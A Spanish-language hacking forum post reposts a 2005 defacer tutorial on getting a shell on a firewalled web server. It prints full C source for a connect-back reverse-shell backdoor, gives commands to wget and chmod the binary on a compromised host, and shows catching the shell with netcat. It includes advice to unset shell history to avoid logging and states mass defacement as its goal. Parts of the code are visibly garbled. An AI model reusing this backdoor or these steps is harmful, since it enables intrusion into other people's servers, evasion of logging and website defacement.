Shell con Firewall

Iniciado por dracko.rx, Febrero 24, 2010, 02:51:35 PM

Tema anterior - Siguiente tema

0 Miembros y 1 Visitante están viendo este tema.

############################################################################

sh-2.05# ./ Escrito por Status-x [ No tienes permitido ver los links. Registrarse o Entrar a mi cuenta ] - Mexico

############################################################################

********************************************** ******************************

[ Contenido ]

[ 1 ] .- Introduccion.............................................. Status-x

[ 2 ] .- Backdoors................................................. Status-x

[ 3 ] .- Conexion Reversa.......................................... Status-x

[ 4 ] .- Despedida................................................. Status-x

****************************************************************************

########################################## ##################################

sh-2.05# ./ Introduccion

############################################################################

Que onda, seguramente muchas veces a algunos ustedes el backdoor de su

preferencia no les conecta, bien esto significa que el servidor tiene fire

wall y por lo tanto no acepta conexiones por los distintos puertos que los

backdoors usan, es por eso que veremos como conectarnos aunque el servidor

tenga firewall, para eso utilizaremos un backdoor de conexion reversa que es

mucho mas amigable que trabajar con netcat :)

############################################################################

sh-2.05# ./ Backdoors

############################################################################

r0nin, vaya backdoor jejejeje seguramente muchos solo conocen ese, se han

quedado estancados ahi, al leer un tuto y hacer su primer deface ya son

elites y van presumiendo por distintas webs que saben hacer un deface sin

embargo creo que solo se conforman con hacer su index

------------------------------
echo Yo soy hax0r >index.html
------------------------------

Bien, un backdoor como su nombre lo indica en español es una aplicacion que

nos abrira una puerta trasera por la cual entrar, similar en funcionamiento

a los clasicos troyanos, hay distintos backdoors y hay algunos que solo fun

cionan con determinado OS, esto quiere decir que para cada Os podria haber

un backdoor, en este caso usaremos un backdoor normal cuyo autor es

Innocent Boys de Brazil.

Comenzaremos haciendo que el backdoor haga su funcion abrirnos un puerto

,bien en este caso el backdoor me habre una puerta en el 9865

En un ejecutor de comandos correremos el backdoor:

---------------------------------------------------------------------------
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
?&cmd=cd /tmp;./backdoor

Innocent Boys Backdoor

Binding the 9865
OK, pid = 30584
---------------------------------------------------------------------------

Ahora nos trataremos de conectar por el putty o con telnet:

-----------------------------------------------

telnet:localhost:9865

-----------------------------------------------

S in embargo vemos que no nos da la shell, esto quiere decir que tendremos

que echar mano de un backdoor especial que sirve para hacer conexion reversa

y nos conectara aunque el servidor tenga firewall :)

############################################################################

sh-2.05# ./ Conexion Reversa

############################################################################

Para conectarnos usaremos un backdoor de conexion reversa, llamado ConnectBack

Backdoor, :) a continuacion su codigo fuente

------------------------ COTAR AQUI ---------------------------------
#include <stdio.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netdb.h>
int main(int argc, char **argv) {
char *host;
int port = 80;
int f; int l;
int sock;
struct in_addr ia;
struct sockaddr_in sin, from;
struct hostent *he;
char msg[ ] = "Connect Back Shell "
"Issue \"export TERM=xterm; exec bash -i\" "
"For More Reliable Shell. "
"Issue \"unset HISTFILE; unset SAVEHIST\" "
"For Not Getting Logged. (; ";
printf("Connect Back Backdoor ");
if (argc < 2 || argc > 3) {
printf("Usage: %s [Host] <port> ", argv[0]);
return 1;
}
printf("
  • Dumping Arguments ");
    l = strlen(argv[1]);
    if (l <= 0) {
    printf("[-] Invalid Host Name ");
    return 1;
    }
    if (!(host = (char *) malloc(l))) {
    printf("[-] Unable to Allocate Memory ");
    return 1;
    }
    strncpy(host, argv[1], l);
    if (argc == 3) {
    port = atoi(argv[2]);
    if (port <= 0 || port > 65535) {
    printf("[-] Invalid Port Number ");
    return 1;
    }
    }
    printf("
  • Resolving Host Name ");
    he = gethostbyname(host);
    if (he) {
    memcpy(&ia.s_addr, he->h_addr, 4);
    } else if ((ia.s_addr = inet_addr(host)) == INADDR_ANY) {
    printf("[-] Unable to Resolve: %s ", host)
    return 1;
    }
    sin.sin_family = PF_INET;
    sin.sin_addr.s_addr = ia.s_addr;
    sin.sin_port = htons(port);
    printf("
  • Connecting... ");
    if ((sock = socket(AF_INET, SOCK_STREAM, 0)) == -1) {
    printf("[-] Socket Error ");
    return 1;
    }
    if (connect(sock, (struct sockaddr *)&sin, sizeof(sin)) != 0) {
    printf("[-] Unable to Connect ");
    return 1;
    }
    printf("
  • Spawning Shell ");
    f = fork( );
    if (f < 0) {
    printf("[-] Unable to Fork ");
    return 1;
    } else if (!f) {
    write(sock, msg, sizeof(msg));
    dup2(sock, 0);
    dup2(sock, 1);
    dup2(sock, 2);
    execl("/bin/sh", "shell", NULL);
    close(sock);
    return 0;
    }
    printf("
  • Detached ");
    return 0;
    }0; }
    ------------------------------------------------------------------------

    Este backdoor nos permitira conectarnos aunque el server tenga firewall

    sin embargo el backdoor solo funcionara si tenemos una conexion por

    Dial Up ya que he testeado con ADSL y no funciona ;)

    Para descargar el backdoor ya compilado:

    -------------------------------
    No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
    -------------------------------

    Bien empezemos:

    En nuestro ejecutor de comandos nos cambiaremos a un directorio con

    permisos de escritura, ya explique como se hace eso :), y despues

    subiremos el backdoor :) y le daremos permisos 777

    ----------------------------------------------------

    cd /dir/;wget No tienes permitido ver los links. Registrarse o Entrar a mi cuenta; chmod 777 dc

    ----------------------------------------------------

    La siguiente herramienta que utilizaremos para poder conectarnos

    al servidor sera netcat, que servira como programa escucha y ahi

    recibiremos la shell.

    En dado caso que estemos bajo Windows haremos lo siguiente en

    nuestra linea de comandos :) ejecutaremos nuestro netcat:

    ------------------------------------------

    Microsoft Windows XP [Versión 5.1.2600]
    (c) Copyright 1985-2001 Microsoft Corp. <-------ejecutamos Netcat

    C:\Documents and Settings\Status-x>nc
    Cmd line:

    -------------------------------------------

    Nos saldra algo como Cmd line: aqui especificaremos el comando

    para que Netcat se ponga a la escucha y podamos obtener la shell :)

    el comando que pondremos sera:

    --------------------
    -vv -l -p puerto
    --------------------

    Y si lo hicimos bien en el netcat nos saldra lo siguiente:

    -------------------------------------------

    C:\Documents and Settings\Status-x>nc
    Cmd line: -vv -l -p 80
    listening on [any] 80 ...

    -------------------------------------------

    cabe mencionar que tendremos que desactivar nuestros firewall para

    que podamos recibir la shell, esto involucra tambien desactivar

    el servidor de seguridad de internet de microsoft, esto se hace asi:

    ------------------------------------------------------------------
    Inicio > Conexiones de red > Tu Conexion > Propiedades > Avanzadas
    ------------------------------------------------------------------

    Y ahi desactivas la palomita de hasta arriba

    Entonces ya tenemos nuestro netcat a la escucha y lo unico que falta

    es obtener la shell :), entonces nos vamos a nuestro ejecutor de

    comandos y ejecutamos el backdoor:

    --------------------
    ./dc

    usage: ./dc <ip> <port>

    --------------------

    Ahora solo nos queda sustituir los valores que nos piden

    IP - Tu ip

    Port - Puerto que hayas especificado en el Netcat

    En este caso yo especifique el puerto 80 y procedemos a ejecutarlo :)

    -----------------------

    ./dc 200.145.23.34 80
    |
    | Tu IP
    |
    Backdoor Puerto

    -----------------------

    Si lo hicimos todo bien en el ejecutor de comandos nos debe salir algo como esto:

    ---------------------------
    Connect Back Backdoor

  • Dumping Arguments
  • Resolving Host Name
  • Connecting...
  • Spawning Shell
  • Detached

    -----------------------------

    y en el Netcat debe de haber aparecido la Shell!!!!!

    Sin embargo si aparece esto:

    -------------------------
    Connect Back Backdoor

  • Dumping Arguments
  • Resolving Host Name
  • Connecting...
    [-] Unable to Connect
    -------------------------

    Quiere decir que tu red no acepta este tipo de conexion o que hiciste algo mal

    , asi que checa tu IP, puerto, que el netcat este a la escucha, etc :)

    Recomiendo utilizar puertos de servicios que no sean sospechosos y con mayor

    probabilidad de que te conecten como: 80, 25, 15 ;)

    ############################################################################

    sh-2.05# ./ Despedida

    ############################################################################

    Bueno pues un tutorial mas, que estoy seguro les sera de ayuda a muchisimas

    personas que creian perdido su mass defacement :) jjejejejeje, espero que

    les haya gustado el tutorial si tienen dudas ya saben mi

    mail: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

    MSN: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

    web: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

    Bye a todos ;)

    un Saludo especial a Data Cha0s y Command Tribulation por facilitar las

    herramientas y la shell en que fue testeado el backdoor ;)

    ############################################################################

    sh-2.05b$ ./ exit

    Copyright 2005 Defacers Mexico - No modificar sin permiso de su autor

    Si publicas este texto en tu sitio por favor no lo modifiques ;)

    ############################################################################
Venta de diseños - Contactar por MP

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta